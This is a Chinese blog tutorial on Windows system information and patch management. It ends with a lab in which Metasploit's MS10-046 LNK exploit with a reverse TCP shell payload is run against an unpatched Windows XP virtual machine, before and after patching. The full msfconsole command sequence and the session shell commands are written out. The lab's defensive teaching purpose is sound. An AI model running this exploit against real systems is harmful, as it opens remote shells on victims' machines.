Windows安全加固系列-----系统信息与补丁管理

2019/6/11 ----

此文章关于介绍Windows系统信息和补丁管理,针对补丁管理有一个小实验,来说明补丁管理的重要性。

系统信息

了解当前系统的信息
(1)版本
Windows NT是一系列操作系统的总称
命令:
1)ver
在这里插入图片描述
2) winver
Windows安全加固系列-----系统信息与补丁管理_第1张图片

  1. systeminfo (显示的更加详细)
    Windows安全加固系列-----系统信息与补丁管理_第2张图片

2、查看sp
service packet (sp) 服务补丁包(一系列补丁的集合)
wmic os get servicepackmajorversion
在这里插入图片描述

3、查看hotfix----热补丁
针对单一漏洞的补丁
wmic qfe get hotfixid,installedon
Windows安全加固系列-----系统信息与补丁管理_第3张图片

4、查看主机名----hostname
在这里插入图片描述

5、查看网络配置-----ipconfig /all
Windows安全加固系列-----系统信息与补丁管理_第4张图片

6、查看路由表-----route print
Windows安全加固系列-----系统信息与补丁管理_第5张图片

7、查看开放端口----netstat -ano

Windows安全加固系列-----系统信息与补丁管理_第6张图片
扩展:

1、netstat -ano | find “:443” 查看开放端口443端口号对应的进程
Windows安全加固系列-----系统信息与补丁管理_第7张图片
2、tasklist -V | find “6988” 查找pid号8112的进程,-v 显示的更详细

在这里插入图片描述
3、taskkill /PID 6988 /T /F 强行终止一个进程
在这里插入图片描述
错误:权限无法访问
解决方法:右击cmd,用管理员身份运行
Windows安全加固系列-----系统信息与补丁管理_第8张图片在这里插入图片描述


补丁管理

关于补丁管理的小实验

实验环境:
用VMware 模拟真实环境
一台kail linux 和windows xp 系统的主机
实验原理:
在kali linux上使用msfconsole利用ms10-046 漏洞对没有系统更新或打补丁的xp主机,进行攻击。
然后在xp主机上打上针对这种漏洞攻击的补丁,再进行攻击

文件快捷方式漏洞MS10-046,利用Windows快捷方式LNK文件的漏洞自动执行代码漏洞攻击。

实验准备:
kali linux 与 Windows xp 能互相ping通,
Windows xp 可以上外网。

Windows安全加固系列-----系统信息与补丁管理_第9张图片
实验工具:
这里准备了针对这个漏洞的补丁,和扫描漏洞的工具 MBSA

Microsoft 基准安全分析器 (MBSA) 可以检查操作系统和 SQL Server 更新,
还可以扫描计算机上的不安全配置。

链接:https://pan.baidu.com/s/1wrx65I_HrTkRv1-1PXjnCw
提取码:rzcp

MBSA工具的使用

双击安装软件,然后点击next
Windows安全加固系列-----系统信息与补丁管理_第10张图片
选择 I accept the license agreement,点击next
Windows安全加固系列-----系统信息与补丁管理_第11张图片
点击next
Windows安全加固系列-----系统信息与补丁管理_第12张图片
点击install
Windows安全加固系列-----系统信息与补丁管理_第13张图片
点击OK,点击桌面的应用程序
Windows安全加固系列-----系统信息与补丁管理_第14张图片
点击scan a computer
Windows安全加固系列-----系统信息与补丁管理_第15张图片
点击start scan
Windows安全加固系列-----系统信息与补丁管理_第16张图片
等待结束
Windows安全加固系列-----系统信息与补丁管理_第17张图片
继续等待
Windows安全加固系列-----系统信息与补丁管理_第18张图片
然后就可以看到有哪些策略不符合安全设置
Windows安全加固系列-----系统信息与补丁管理_第19张图片
实验开始:
一、kali linux 上用msfconsole攻击xp 主机

1、msfconsole		---调用攻击工具
2、search ms10-046		---扫描这个漏洞是否存在
3、use exploit/windows/browser/ms10_046_shortcut_icon_dllloader	---使用这个漏洞	
4、set payload windows/shell/reverse_tcp		---设置反向链接
5、show options			---查看选项
6、set srvhost 192.168.136.10			---设置攻击者的ip地址(kali 的IP地址 )
7、set lhost 192.168.136.10			---设置反向链接的IP地址(kali 的ip地址)
8、show options			---查看选项
9、exploit			---发动攻击

Windows安全加固系列-----系统信息与补丁管理_第20张图片
二、在xp上模拟中招,输入url地址:http://192.168.136.10:80/
Windows安全加固系列-----系统信息与补丁管理_第21张图片Windows安全加固系列-----系统信息与补丁管理_第22张图片

三、查看会话,夺取shell,输入ipconfig,查看ip,攻击成功。。
1、sessions -i
2、sessions -i 1
3、ipconfig

Windows安全加固系列-----系统信息与补丁管理_第23张图片
四、安装补丁
Windows安全加固系列-----系统信息与补丁管理_第24张图片Windows安全加固系列-----系统信息与补丁管理_第25张图片Windows安全加固系列-----系统信息与补丁管理_第26张图片Windows安全加固系列-----系统信息与补丁管理_第27张图片
五、再次攻击,发现攻击无效。。补丁的作用体现了出来(⊙_⊙)
在这里插入图片描述Windows安全加固系列-----系统信息与补丁管理_第28张图片
OK,有什么问题,欢迎评论交流 ?

你可能感兴趣的:(Windows安全加固系列)